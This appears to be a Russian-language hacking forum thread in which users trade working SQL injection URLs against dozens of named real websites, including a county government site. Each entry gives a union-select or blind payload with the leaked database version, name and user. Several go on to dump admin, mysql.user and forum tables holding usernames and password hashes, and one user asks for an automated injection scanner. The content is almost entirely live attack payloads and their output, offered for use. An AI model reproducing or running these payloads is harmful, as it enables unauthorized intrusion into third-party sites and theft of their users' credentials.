Code: http://www.bulletinpa.com/index.php?id=-907+union+select+1,2,3,4,5,6,7,8,9/* blind --------------------------------------------------------------------------------------------------------- Code: http://travel.emeraldcoast.com/article.php?id=-175+union+select+1,version(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21/* Database Version: 5.0.26-standard-log Database name: iansawesomedb User name: [email protected] --------------------------------------------------------------------------------------------------------- Code: http://www.stormbringer.at/news.php?id=-3706'+union+select+1,2,3,4,5,admin_id,7,8,9,0,11,12,13+from+admin/* Database Version: 5.0.45 Database name: usr_web5_1 User name: web5@localhost
http://www.ibnlokmat.tv/gallery.php?id=1&conid=-57082+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7-- 5.0.27-standard-log:[email protected]:ibnlokmat #################################### http://wcha.tv/live.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9-- 5.0.22-Debian_0ubuntu6.06.10-log:site_wcha_tv:[email protected] #################################### http://www.tv-portal.ru/index.php?kanal=-339+union+select+1,2,concat_Ws(0x3a,database(),user(),version()),4,5,6,7,8,9,10,11&stat-id=1 db_kokos32_2:[email protected]:4.1.22 #################################### http://laurabenjamin.tv/video.php?id=1§ion=1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5-- [email protected]:LBTV:4.1.22-max-log #################################### PR: 5 http://www.fabawards.tv/view-fabawards-2009show.php?id=1'+union+select+1,concat_ws(0x3a,user(),database(),version()),3+from+mysql.user+--+ All_DB_Admin@localhost:fabawards:5.0.83-rs вывод в пути картинки..есть mysql.user...путь так и не нашел ((( #################################### http://www.na.owns.tv/index.php?page=userprofile&id=-1'+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+/*+ naownstv@localhost:naownstv-web:4.1.20 #################################### http://www.tv-live.ro/radio-live.php?id=-1+UnIoN+SeLeCT+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6-- tvlive@localhost:tvlive_db:5.0.67-community.jpg #################################### http://ua.tv-mis.com/titul.php?id=1+and+substring(version(),1,1)=5-- #################################### PR 3 http://www.supplyanddemand.tv/show_news.php?id=-1+union+select+1,2,concat_Ws(0x3a,database(),user(),version()),4-- supplyd:supplyd@localhost:4.0.25 #################################### http://www.vehiclegraphics.tv/view.php?id=1'+and+substring(version(),1,1)=5+/*+ #################################### http://www.lancs.tv/index.php?PHPSESSID=urewmdaiezvwdmn&p=page&id=-1+union+select+1,2,concat_Ws(0x3a,user(),database(),version())-- lccc-root@localhost:lancstv:5.0.51b-log #################################### http://www.famicomdojo.tv/subscription.php?id=1+union+select+1,2,3,4,5,6,7,8,concat_Ws(0x3a,user(),database(),version()),10,11,12,13,14,15,16,17-- tfboogaloo@logic:FamicomDojo:5.0.37-standard
http://www.catan.ro/index.php?pagina=stire&id=-43+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4 Database Version: 4.1.22-standard-log Database name: catanro_catan User name: catanro_catan@localhost Os : pc-linux-gnu
1)ребята подскажите какую нибудь прогу сканнер sql, чтобы ссама бегала по сайту подставляя ковычки в переменные в поисках мускл ошибок. 2) И ещё оч прошу покажите на примере урла как правильно заюзать в update Изменить значений переменных в базу с sql inj запроса. Спасиб большое.
mssql [PR 5] Code: http://www.coveredbridges.com/events/annualEvents.asp?id=1+or+1=@@version-- ==================================== [PR 4] Code: http://www.anconia.com/support/faq.asp?id=1218+or+1=@@version-- ==================================== ==================================== [PR 6] Code: http://www.juristenverband.at/kalender.php?id=-137+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12 4.0.21:juristenverband:root@localhost Code: http://www.juristenverband.at/kalender.php?id=-137+union+select+1,2,3,4,5,concat_ws(0x3a,user,password,file_priv),7,8,9,10,11,12+from+mysql.user ==================================== [PR 3] Code: http://www.werkensepolder.nl/kalender.php?id=-24+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7 4.0.15:werkense:werkense@localhost ==================================== [PR 2] Code: http://www.beitstadfjordmc.no/applic/kalender.php?id=-21+union+select+concat_ws(0x3a,version(),database(),user()) 5.0.32-Debian_7etch10-log:beitstadfjordmc:[email protected] ==================================== [PR 2] Code: http://www.svenarum.nu/kalender.php?id=-1011+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9 5.0.27:svenarum_nu:svenarum.nu@localhost ==================================== [PR 1] Code: http://www.judyreynolds.com/en/kalender.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13 5.0.32-Debian_7etch10-log:db1073307-judy:dbu1073307@localhost Code: http://www.judyreynolds.com/en/kalender.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,id,name,pass,admin),6,7,8,9,10,11,12,13+from+user ==================================== [PR 1] Code: http://www.vvvolkegem.be/kalender.php?ID=-11+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10-- 4.1.22-standard:voevol06_volkegem:voevol06_43sj29a@localhost ==================================== [PR 0] Code: http://www.donkerewolk.net/kalender.php?id=-22+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5 5.0.37-standard:tarsforier_wolk:tarsforier_tf@localhost Code: http://www.donkerewolk.net/kalender.php?id=-22+union+select+1,2,concat_ws(0x3a,user_id,username,userpass),4,5+from+poll_user ==================================== [PR 0] Code: http://www.h-lebt.de/kalender.php?id=9999999999+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16--&month=6 5.0.32-Debian_7etch5-log:usr_web0_1:web0@localhost Code: http://www.h-lebt.de/kalender.php?id=9999999999+union+select+1,2,3,4,5,concat_ws(0x3a,username,password),7,8,9,10,11,12,13,14,15,16+from+be_users--&month=6
Code: http://provympel.ru/index3.php?id=56+union+select+1,version(),3,4-- Database Version: 5.0.81-community Database name: magics_complex User name: magics_tester@localhost
giant.md Это кагбе самые крутые лесапеды в молдове Code: http://www.giant.md/news.php?id=-17%20UNION%20SELECT%20CONCAT_WS(0x3a,DATABASE(),USER(),VERSION()),2,3,4-- Code: 13404:13404@localhost:5.0.77 таблы (колонки) Code: [COLOR=YellowGreen]cat_velo[/COLOR] (id, category, type, year, razmer_rami, rama, vilka, z_perecl, p_perecl, manetki, shatuni, pedali, ruli, vinos, rulevaia_kolonka, ru4ki_tormoza, p_tormoz, z_tormoz, sedlo, podsedelinii_shtir, oboda, p_vtulka, z_vtulka, pokrishki, spitsi, karetka, tsepi, kasseta, kolvo_skorostei, exact_name, color, picture, description, price) [COLOR=YellowGreen]categories[/COLOR] (id, name, text, picture, big_text, big_picture, width, type) [COLOR=YellowGreen]contact[/COLOR] (id, name, email, topic, msg) [COLOR=YellowGreen]fish_config[/COLOR] (id, name, value, description, code) [COLOR=YellowGreen]fish_feedback[/COLOR] (id, name, email, msg, dat) [COLOR=YellowGreen]fish_labels[/COLOR] (id, param, value, code) [COLOR=YellowGreen]fish_language[/COLOR] (id, value, language) [COLOR=YellowGreen]fish_news[/COLOR] (id, title, text, picture, active, dat, code) [COLOR=YellowGreen]fish_photoalbum[/COLOR] (id, title_en, descr_en, title_md, descr_md, title_ru, descr_ru, folder, active) [COLOR=YellowGreen]fish_sections[/COLOR] (id, value, name_en, name_ru, name_md, active) [COLOR=YellowGreen]fish_service[/COLOR] (id, title, text, picture, price, dat, code, active) [COLOR=YellowGreen]fish_tips[/COLOR] (id, text, picture, dat, code, active) [COLOR=YellowGreen]guest[/COLOR] (id_msg, name, city, email, url, msg, answer, puttime, hide) [COLOR=YellowGreen]news[/COLOR] (id, title, picture, preview, text, date, time) [COLOR=YellowGreen]pro_accessories[/COLOR] (id, category, name, art_no, picture, price, descr) [COLOR=YellowGreen]proposals[/COLOR] (id, title, picture, descr, date, active) [COLOR=YellowGreen]secret_agents[/COLOR] (id, login, password) [COLOR=YellowGreen]service[/COLOR] (id, name, value) [COLOR=YellowGreen]shimano_parts[/COLOR] (id, category, name, art_no, picture, price, descr, bike_type, ride_type) [COLOR=YellowGreen]silver_djs[/COLOR] (id, name, photo_small, photo_big, bday, contacts, about) [COLOR=YellowGreen]silver_news[/COLOR] (id, title, pic_small, pic_big, preview, text, date, time) [COLOR=YellowGreen]silver_posters[/COLOR] (id, title, text, from_date, to_date, added) [COLOR=YellowGreen]silver_progs[/COLOR] (id, title, descr, djs) [COLOR=YellowGreen]silver_schedule[/COLOR] (id, id_prog, weekday, begin, end) [COLOR=YellowGreen]stat_global[/COLOR] (id, razdel, visits, month) [COLOR=YellowGreen]stat_razdel[/COLOR] (id, id_user, razdel, dat) [COLOR=YellowGreen]stat_users[/COLOR] (id, ip, sid, dat) [COLOR=YellowGreen]wp_comments[/COLOR] (comment_ID, comment_post_ID, comment_author, comment_author_email, comment_author_url, comment_author_IP, comment_date, comment_date_gmt, comment_content, comment_karma, comment_approved, comment_agent, comment_type, comment_parent, user_id) [COLOR=YellowGreen]wp_links[/COLOR] (link_id, link_url, link_name, link_image, link_target, link_category, link_description, link_visible, link_owner, link_rating, link_updated, link_rel, link_notes, link_rss) [COLOR=YellowGreen]wp_options[/COLOR] (option_id, blog_id, option_name, option_value, autoload) [COLOR=YellowGreen]wp_postmeta[/COLOR] (meta_id, post_id, meta_key, meta_value) [COLOR=YellowGreen]wp_posts[/COLOR] (ID, post_author, post_date, post_date_gmt, post_content, post_title, post_category, post_excerpt, post_status, comment_status, ping_status, post_password, post_name, to_ping, pinged, post_modified, post_modified_gmt, post_content_filtered, post_parent, guid, menu_order, post_type, post_mime_type, comment_count) [COLOR=YellowGreen]wp_term_relationships[/COLOR] (object_id, term_taxonomy_id, term_order) [COLOR=YellowGreen]wp_term_taxonomy[/COLOR] (term_taxonomy_id, term_id, taxonomy, description, parent, count) [COLOR=YellowGreen]wp_terms[/COLOR] (term_id, name, slug, term_group) [COLOR=YellowGreen]wp_usermeta[/COLOR] (umeta_id, user_id, meta_key, meta_value) [COLOR=YellowGreen]wp_users[/COLOR] (ID, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name)
Code: http://www.praguepubs.co.uk/pubs_details.php?id=-3+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+information_schema.tables-- 5.0.77-community-logpubs_ppubspubs_prague@localhost
blind, version: 5 Code: http://www.perquimanscountync.gov/index.php?page=commissioners&id=6+and+substring(version(),1,1)=5--&mode=printminutes
http://fanboys.dreamhosters.com/index.php?blog=-74+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8--&comic=327
PR5 www.hcjz.hr Code: http://www.hcjz.hr/clanak.php?id=-12521+union+select+concat_ws(0x3a,user(),version(),database(),11111111111111111111111)/* ДБ: [email protected]:5.0.45:hcjz Путь: /users1/hcjz/public_html/ Табличко: jos_users
http://www.washingtoninstitute.org/templateC05.php?CID=-2550'+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--+ 5.0.67-log winep2_2@localhost winep2_production
PR5 www.lakberendezes.hu Code: http://www.lakberendezes.hu/magazin/mutat.php?id=-462+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/* ДБ: 5.0.32-Debian_7etch5-log:lakber:lakberftp@localhost Путь: /home/dv/users/lakberendezes/www/ Табличко: admin && users
http://www.bacchus.tv/index/wine2.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user())-- 5.0.67:bacchus_bacchus:bacchus_bacchus@localhost #################################### http://www.toddlevi.tv/gotw_display.php?id=-1'+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8/* 5.0.27:toddlevi:toddlevi@localhost #################################### ТИЦ: 40 PR: 4 http://www.hypocrisy.tv/mediaplayer/videos.php?id=-1+union+select+concat_Ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8,9-- [email protected]enetralia:5.0.67-userstats-log #################################### http://philmadelphia.tv/portfolio/motion.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user())-- 4.1.25-Debian_mt1:db20241_kelly:[email protected] #################################### Я ТОЖЕ УБИЛ КЕННИ http://www.southpark-tv.com/episode.php?id=1+union+select+1,2,concat_Ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11-- 5.0.68-log:southparasql:[email protected] tables: Code: punbb_censoring,sptv_temp,punbb_groups,wa_admin,punbb_reports,pmnl_archives,wa_forbidden_ext,punbb_subscriptions,pmnl_sub,wa_log_files,sptv_referer,punbb_config,videos,punbb_online,wa_auth_admin,punbb_search_cache,pmnl_config,wa_joined_files,punbb_topics,pmnl_temp,wa_session,sptv_referer_out,sptv_referer_site,punbb_forum_perms,wa_abo_liste,punbb_posts,wa_ban_list,punbb_search_matches,pmnl_email,wa_liste,punbb_users,punbb_bans,sptv_referer_toplist,punbb_forums,wa_abonnes,punbb_ranks,wa_config,punbb_search_words,pmnl_listsconfig,wa_log,ratings,punbb_categories user_tables: punbb_users Code: http://www.southpark-tv.com/episode.php?id=1+union+select+1,2,group_concat(concat_Ws(0x3a,username,password)),4,5,6,7,8,9,10,11+from+punbb_users--
Code: http://www.sale-info.ru/lot.php?id=-227+union+select+1,2,3,4,5,7,8,9,10,concat_ws(0x3a,database(),version(),user()),12,13-- u19167:5.0.67-log:[email protected] Code: http://www.region-oz.ru/home.php?id=-10+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- regionoz_baze:5.0.32-Debian_7etch1-log:[email protected]
http://www.allnovgorod.ru/show-kino.php?id=-9+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 5.0.81-community-log:allnovgo_allnovg@localhost:allnovgo_site http://menticid.com/entertainment/kino.php?id=-54+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10 4.0.27-max-log:[email protected]:db30998491
Давненько я тут не постил... Code: http://bikez.com/msgboard/msg.php?id=22048+and+null+union+select+unhex(hex(concat_ws(0x3a,user(),database(),version()))),2,3,4&type=bike hholm@localhost:hholm:4.1.1
